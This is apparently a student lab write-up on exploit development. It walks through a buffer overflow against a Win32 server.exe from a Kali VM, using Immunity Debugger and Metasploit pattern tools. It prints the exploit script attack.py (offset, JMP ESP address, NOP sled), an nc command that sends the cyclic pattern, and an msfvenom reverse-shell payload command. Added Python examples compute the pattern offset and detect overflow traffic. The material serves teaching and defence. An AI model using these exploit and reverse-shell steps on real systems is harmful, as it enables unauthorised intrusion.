ICT Ethical Hacking: Exploit Development Process

Added on  2023/06/04

Running head: ICT ETHICAL HACKING
ICT ETHICAL HACKING
Name of the Student
Name of the university
Author Note

Exploit development is a critical process that takes advantage of a vulnerability or bug
in order to cause unanticipated or unintended behaviour in software or hardware. It is
frequently used to gain control of a computer system, allowing privilege escalation or a
denial-of-service attack. The whole development process has been divided into a number of
phases. The exploit development process is as follows:
Preparation:
First, the Kali virtual machine is opened, followed by the Win32 Buffer Victim virtual
machine. Before starting any work, it is necessary to ensure that both virtual machines are
set to NAT networking. Then the IP addresses of both machines are checked.
1. Open Kali virtual machine
2. Open Win32 Buffer Victim virtual machine
3. Ensure both are set to NAT networking
4. Check the IP addresses on both
Finding the Overflow:
In the next phase, Immunity Debugger is opened on the Windows host and server.exe is
loaded into it. Execution is then started by pressing the F9 key. Next, a new file named
"attack.py" is created on Kali. This file contains the following Python code:
#!/usr/bin/python  # hashbang (shebang) line
import sys     # system-specific parameters and functions (command-line arguments)
import os      # operating-system dependent functionality (unused here, kept from the original)
import socket  # TCP connection to the target service

host = sys.argv[1]       # first argument: IP address of the Windows VM
port = int(sys.argv[2])  # second argument: TCP port of server.exe (1337)

# Testing: 500 bytes of "A" (0x41)
buffer = b"\x41" * 500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
Then the command "python attack.py IP_ADDRESS 1337" is run, where IP_ADDRESS is the
address of the Windows virtual machine. We then switch to the Windows environment and press
Shift+F9 to pass the exception to the executable.
We can see that EIP now contains our value (0x41414141), as does EBP, while ESP points to a
region of memory which contains our injected bytes.
Weaponizing the vulnerability:
In this phase, server.exe is restarted by pressing CTRL + F2 within Immunity Debugger, and
execution is started again by pressing F9. On Kali, the directory is changed to the
Metasploit tools by running cd /usr/share/metasploit-framework/tools/exploit. Run
./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP
address of the Windows VM; this sends a 5000-byte non-repeating pattern in place of the "A"s.
Then press SHIFT + F9 within Immunity Debugger to pass the exception and read the value left
in EIP (37694136). Run ./pattern_offset.rb -l 5000 -q 37694136 within Kali to determine the
offset at which EIP is overwritten. Now we must determine the address of an instruction which
jumps to ESP (JMP ESP), so that execution continues inside our buffer. The attack.py file is
modified as follows:
#!/usr/bin/python
import sys
import os
import socket

host = sys.argv[1]       # IP address of the Windows VM
port = int(sys.argv[2])  # TCP port of server.exe (1337)

# Placeholder: the shellcode generated in the next phase is pasted here
shellcode = b""

# EIP is overwritten at 260 bytes
buffer = b"\x41" * 260

# Overwrite EIP with the address of a JMP ESP instruction
# (0x77F31678, written in little-endian byte order)
buffer += b"\x78\x16\xF3\x77"

# NOP sled
buffer += b"\x90" * 128

# Shellcode
buffer += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
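The following Python is an added example, not part of the original write-up and not the Metasploit tools themselves. It re-implements what pattern_create.rb and pattern_offset.rb compute, so the offset of 260 used above can be reproduced and checked offline. It assumes the standard Metasploit pattern alphabet (uppercase letter, lowercase letter, digit triplets) and a 32-bit little-endian register. It goes slightly beyond the write-up by also checking the property the method depends on (every 4-byte window of the pattern is unique) and by showing why the earlier all-"A" probe cannot give an offset.

```python
# Added example (not from the original assignment or Metasploit): a Python
# re-implementation of the cyclic pattern and the offset query used above.
import itertools
import string
import struct


def cyclic_pattern(length):
    """Return `length` bytes of the Metasploit-style non-repeating pattern.

    The pattern is the sequence of 3-byte groups Aa0, Aa1, ..., Aa9, Ab0, ...
    (uppercase, lowercase, digit), which keeps every 4-byte window unique
    within the first 20,280 bytes."""
    out = bytearray()
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, register_value):
    """Offset in `pattern` of the 4 bytes that ended up in a 32-bit register.

    `register_value` is the number shown by the debugger (e.g. 0x37694136).
    x86 is little-endian, so the value is packed back into in-memory byte
    order before searching. Returns -1 if the bytes are not in the pattern."""
    needle = struct.pack("<I", register_value)
    return pattern.find(needle)


def offset_candidates(data, register_value):
    """All offsets at which the register bytes occur in `data`.

    For a proper cyclic pattern this is a single offset; for a buffer of
    repeated bytes it is ambiguous, which is why the pattern is needed."""
    needle = struct.pack("<I", register_value)
    return [i for i in range(len(data) - 3) if data[i:i + 4] == needle]


def has_unique_windows(pattern, width=4):
    """True if no `width`-byte window occurs twice in `pattern`."""
    seen = set()
    for i in range(len(pattern) - width + 1):
        window = pattern[i:i + width]
        if window in seen:
            return False
        seen.add(window)
    return True


if __name__ == "__main__":
    pat = cyclic_pattern(5000)
    print("offset of 0x37694136:", pattern_offset(pat, 0x37694136))      # 260
    print("bytes at that offset:", pat[260:264])                          # b'6Ai7'
    print("4-byte windows unique:", has_unique_windows(pat))              # True
    print("candidates with the all-A probe:",
          len(offset_candidates(b"\x41" * 500, 0x41414141)))              # 497
```

The query value 37694136 is the register contents read from the debugger; packed little-endian it becomes the bytes "6Ai7", which occur exactly once in the pattern, at offset 260. The same search on the 500-byte "A" probe matches at 497 positions, which is why the first probe only proves that the overflow exists and the cyclic pattern is needed to locate it.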
Developing Shellcode:
1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e
x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python, where <KALI_IP> is the IP
address of the Kali virtual machine. The -f python option prints the shellcode as Python
string literals that can be pasted directly into attack.py.
3. Modify the attack.py file to include the generated shellcode.
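From the defender's side, the messages produced by the probes above have an easily recognisable shape. The following Python is an added example, not part of the original write-up, of an input inspector that a network monitor or the server's own input-validation layer could apply to each message received on the service port. It flags messages longer than the protocol's expected maximum, long runs of a single padding byte (such as the 500 x 0x41 probe), and NOP sleds. The 256-byte expected maximum, the thresholds, and the three sample messages are constructed assumptions.

```python
# Added example (not part of the original write-up): inspecting messages received
# on the vulnerable service for the shapes produced by the overflow probes.
# EXPECTED_MAX, the thresholds and the sample messages are constructed assumptions.

EXPECTED_MAX = 256   # assumed: longest legitimate message the service handles
PAD_MIN = 64         # one byte repeated this often is reported as padding
SLED_MIN = 32        # this many consecutive 0x90 bytes is reported as a NOP sled


def longest_run(data):
    """Return (byte, length) of the longest run of one repeated byte in data."""
    best_byte, best_len = None, 0
    cur_byte, cur_len = None, 0
    for b in data:
        if b == cur_byte:
            cur_len += 1
        else:
            cur_byte, cur_len = b, 1
        if cur_len > best_len:
            best_byte, best_len = cur_byte, cur_len
    return best_byte, best_len


def longest_nop_run(data):
    """Length of the longest run of 0x90 (x86 NOP) bytes in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def inspect_payload(data, expected_max=EXPECTED_MAX):
    """Return a list of human-readable findings for one received message.

    An empty list means nothing about the message looked like overflow traffic."""
    findings = []
    if len(data) > expected_max:
        findings.append("oversized: %d bytes (max %d)" % (len(data), expected_max))
    byte, run = longest_run(data)
    if run >= PAD_MIN:
        findings.append("padding: 0x%02x repeated %d times" % (byte, run))
    sled = longest_nop_run(data)
    if sled >= SLED_MIN:
        findings.append("nop sled: %d x 0x90" % sled)
    return findings


# Constructed sample messages
BENIGN = b"HELLO server\r\n"            # a normal short request (assumed protocol)
PROBE = b"\x41" * 500                   # the first attack.py send
WEAPONIZED = (b"\x41" * 260             # padding up to EIP
              + b"\x78\x16\xF3\x77"     # return address bytes from attack.py
              + b"\x90" * 128           # NOP sled
              + b"Z" * 40)              # constructed stand-in for the shellcode

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("probe", PROBE), ("weaponized", WEAPONIZED)):
        print(name, inspect_payload(msg) or ["no findings"])
```

The benign message produces no findings, the 500-byte probe is reported as oversized padding, and the weaponized message additionally triggers the NOP-sled rule. The length check alone is the one that matters for the server itself: rejecting (or truncating) anything above the expected maximum before it is copied into a fixed-size buffer is what prevents the overwrite of EIP in the first place.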